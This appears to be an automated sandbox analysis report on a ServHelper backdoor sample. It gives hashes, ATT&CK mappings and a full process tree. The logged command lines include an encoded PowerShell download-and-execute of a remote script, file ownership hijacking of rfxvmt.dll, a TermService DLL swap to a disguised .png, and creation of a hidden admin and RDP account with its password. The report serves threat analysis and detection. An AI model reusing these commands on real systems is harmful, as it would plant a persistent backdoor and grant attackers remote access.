servhelper | c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90

Analysis

max time kernel
123s
max time network
124s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
15-04-2024 17:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f19b9d6b74f65125623613a334baba76_JaffaCakes118.exe
Size

7.0MB
MD5

f19b9d6b74f65125623613a334baba76
SHA1

8b1428daa9a7d2231663784c2e0457034dbdd468
SHA256

c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90
SHA512

f993b7002c952cc754d86726031052fde8dcdda6ce29b35aca9f8318e390c86b370f2519cb4ec2374e24645772ef6dfbbb4bcf25c49587e4b5d678588c5a3fd4
SSDEEP

196608:9gwCUo86gyVJHh22fiIUrKqJGZdwInqqwgrSPn:9pv6g+JHhu1WVZdwIqqdr

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2684 powershell.exe
6 2684 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

1488 icacls.exe
1108 icacls.exe
1492 icacls.exe
2280 icacls.exe
2860 takeown.exe
2748 icacls.exe
2104 icacls.exe
880 icacls.exe

flow	pid	process
5	2684	powershell.exe
6	2684	powershell.exe

pid	process
1488	icacls.exe
1108	icacls.exe
1492	icacls.exe
2280	icacls.exe
2860	takeown.exe
2748	icacls.exe
2104	icacls.exe
880	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

1048
1048
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2280 icacls.exe
2860 takeown.exe
2748 icacls.exe
2104 icacls.exe
880 icacls.exe
1488 icacls.exe
1108 icacls.exe
1492 icacls.exe

pid	process
1048
1048

pid	process
2280	icacls.exe
2860	takeown.exe
2748	icacls.exe
2104	icacls.exe
880	icacls.exe
1488	icacls.exe
1108	icacls.exe
1492	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
6 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E183BDEF5GK7XCYTNA3B.temp	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2592 WMIC.exe

pid	process
2592	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f06219275b8fda01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1408 reg.exe
Runs net.exe

pid	process
1408	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2000	powershell.exe
2636	powershell.exe
2468	powershell.exe
1660	powershell.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe
2684	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

476
1048
1048
1048
1048

pid	process
476
1048
1048
1048
1048

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeRestorePrivilege	2104	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2592	WMIC.exe
Token: SeAuditPrivilege	2592	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2592	WMIC.exe
Token: SeAuditPrivilege	2592	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2708	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2708	WMIC.exe
Token: SeAuditPrivilege	2708	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2708	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2708	WMIC.exe
Token: SeAuditPrivilege	2708	WMIC.exe
Token: SeDebugPrivilege	2684	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f19b9d6b74f65125623613a334baba76_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2876 wrote to memory of 2000	2876	f19b9d6b74f65125623613a334baba76_JaffaCakes118.exe	powershell.exe
PID 2876 wrote to memory of 2000	2876	f19b9d6b74f65125623613a334baba76_JaffaCakes118.exe	powershell.exe
PID 2876 wrote to memory of 2000	2876	f19b9d6b74f65125623613a334baba76_JaffaCakes118.exe	powershell.exe
PID 2000 wrote to memory of 2692	2000	powershell.exe	csc.exe
PID 2000 wrote to memory of 2692	2000	powershell.exe	csc.exe
PID 2000 wrote to memory of 2692	2000	powershell.exe	csc.exe
PID 2692 wrote to memory of 2540	2692	csc.exe	cvtres.exe
PID 2692 wrote to memory of 2540	2692	csc.exe	cvtres.exe
PID 2692 wrote to memory of 2540	2692	csc.exe	cvtres.exe
PID 2000 wrote to memory of 2636	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 2636	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 2636	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 2468	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 2468	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 2468	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 1660	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 1660	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 1660	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 2860	2000	powershell.exe	takeown.exe
PID 2000 wrote to memory of 2860	2000	powershell.exe	takeown.exe
PID 2000 wrote to memory of 2860	2000	powershell.exe	takeown.exe
PID 2000 wrote to memory of 2748	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2748	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2748	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2104	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2104	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2104	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 880	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 880	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 880	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1488	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1488	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1488	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1108	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1108	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1108	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1492	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1492	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 1492	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2280	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2280	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2280	2000	powershell.exe	icacls.exe
PID 2000 wrote to memory of 2060	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 2060	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 2060	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 1408	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 1408	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 1408	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 1164	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 1164	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 1164	2000	powershell.exe	reg.exe
PID 2000 wrote to memory of 2272	2000	powershell.exe	net.exe
PID 2000 wrote to memory of 2272	2000	powershell.exe	net.exe
PID 2000 wrote to memory of 2272	2000	powershell.exe	net.exe
PID 2272 wrote to memory of 2092	2272	net.exe	net1.exe
PID 2272 wrote to memory of 2092	2272	net.exe	net1.exe
PID 2272 wrote to memory of 2092	2272	net.exe	net1.exe
PID 2000 wrote to memory of 1656	2000	powershell.exe	cmd.exe
PID 2000 wrote to memory of 1656	2000	powershell.exe	cmd.exe
PID 2000 wrote to memory of 1656	2000	powershell.exe	cmd.exe
PID 1656 wrote to memory of 1044	1656	cmd.exe	cmd.exe
PID 1656 wrote to memory of 1044	1656	cmd.exe	cmd.exe
PID 1656 wrote to memory of 1044	1656	cmd.exe	cmd.exe
PID 1044 wrote to memory of 2928	1044	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\f19b9d6b74f65125623613a334baba76_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\f19b9d6b74f65125623613a334baba76_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b3fchado.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5542.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5541.tmp"
      4⤵
      PID:2540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2860
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2748
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:880
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1488
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1108
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1492
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2280
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2060
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1408
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1164
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2092
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1044
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2928
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:412
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2976
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:2124
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:1572
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2128
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1224

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:344
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:320

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 5iBSLAFY /add
1⤵
PID:948
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 5iBSLAFY /add
  2⤵
  PID:3068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 5iBSLAFY /add
    3⤵
    PID:1200

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1284
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:916

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
1⤵
PID:668
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
  2⤵
  PID:1992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
    3⤵
    PID:3056

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1652
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2964

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 5iBSLAFY
1⤵
PID:2948
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 5iBSLAFY
  2⤵
  PID:1512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 5iBSLAFY
    3⤵
    PID:1784

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2824
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2592

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2780
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2708

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2416
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5542.tmp

Filesize
1KB

MD5
1382a887e3f0d710602e843811c5c195

SHA1
2a7003996cf2cbd24dc4453cda6bd88873eda3a7

SHA256
fa5109fb93a9dcae9de0bc90f787e87422818538538115bc4bd8bb5a0a8cfdd8

SHA512
cb5d9d2c30e2a695168f6cdf600723837f338717fd0243e90567f308760ad1cd1f10a7a2b89ff786cefda10e0e7b877d3e40fcdd4fb5da1598b27c68d6e7808a

Download Submit
C:\Users\Admin\AppData\Local\Temp\b3fchado.dll

Filesize
3KB

MD5
8ea69c775fdeebc259b44b7dd61edbaf

SHA1
43c1e653e2eb637b95b45d2c754e57341dda4924

SHA256
2bf57642b5ebf3c08e02a93ea0a289bef2d980da77234e7192ccfde1728bfe21

SHA512
5c0d76b69a5234a4b19bc2afc2c9829b7e91f8a5eb745640a3d19b1f2ab467c977d57040d62eb167b545b25502c58d571b7b930f6fca0ae86ebc72f4e0bee89a

Download Submit
C:\Users\Admin\AppData\Local\Temp\b3fchado.pdb

Filesize
7KB

MD5
3ed110f3ba43f9846b18ec4e9ec9da00

SHA1
0baad64905b659bff989e96e771c095b20751935

SHA256
5fb91dc19d46634cdd3d9bcf795ffbc8f1f2fc728a7bd4dc6fbf9f3202484830

SHA512
f47aea29d181e4b49a6e56e4ceeee1c4edc614411931bd08d8fe6dd8eb6cb99c37d376f8279bc0cdeff39a07734a2f80faafc2c79a44c203b886d94985fe73f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
267dcb46e91e0272aab1994b2cf3c9d8

SHA1
7904af5372cec88161ce77f474d2e5deb119821e

SHA256
c319e5b97653ef90e065aaac0c0ad5d2d3a2bfa3de4ccb6abe16d9437b941a21

SHA512
44c76b401ded2501a18e624b95599945768b58f0c04cd500b4713231b19657352f11c16a0abf5dab18403db162aa07c7f55404beacf86da73dad83cea969cdf8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
92038ee2b497385b352a8794f416c3c8

SHA1
736de305b4f5ac504f1bce4efee1268bafa11aba

SHA256
9824bf9ef9c101e8d8af121de16c418c39e4c63b5ec3bdbbf49c8a5c05b80461

SHA512
f718d9be91e56df9b03ee1edbab2dcda710e21652d7659f1c77b6eaad31bd4ad25bce35872d92e7c964c1b39aae018b226dda6bce43036ed86b1e0b5f2e0f1b6

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5541.tmp

Filesize
652B

MD5
3f77ec1cd05bb426836b7fe62d62013f

SHA1
662c0fb1defe516b03e0bbaafbeb043e78036464

SHA256
91922d3251e518756805e77d435f131118a4004f92db1cccf9843e232c9e3574

SHA512
bc3b27e015b4c65cf0207420a59fecae45ab5d0edcd3de1a6c5e466924622a3b88b491594a4a6ee6473d1f4add01a7a72a790e150467bc07a4016da09459953d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b3fchado.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b3fchado.cmdline

Filesize
309B

MD5
c557a7bc05869a55ed118285274e3f81

SHA1
c967c3b628b3a825b6f4cdc08adbde057c9fd2b5

SHA256
1f9915b5b532606214b1930b11f026465086b0845ab8e3b6b4923da6568aaa31

SHA512
64e252b8f4a00f00371730872a72fee8feb619fa58b4ed577f34b941ef3c02df1a5cb32ffcfc7c61832ce44934d924bd4936ebe0267a439045e94fb10e1c22f4

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
c678a2362862a3207f41213684b4923c

SHA1
d33bd5dd67c81d7da3582eeab75702ae9d0d4bf8

SHA256
18b4505916f75075a71d5d94e9fcd18e5e283690f3e6f06f8a3cb4c4d557dc76

SHA512
a4dc8c2fd294433016cf88a9b830940c78ecec0b600d4f2480a1bf68a3817160e188bc1c06e913bf475ed90021bf464ed9cdf1a7ce53977c12c6679650f37a53

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
22d3d81009b0fbcc977658e4a392c17c

SHA1
1f3f415cb3493bcb02fff0368f2f4a4bc91b8bc1

SHA256
9ebeb231fc50b2739a7d96c3f761cbdacdc003361fa69c6330ea83b619d35a07

SHA512
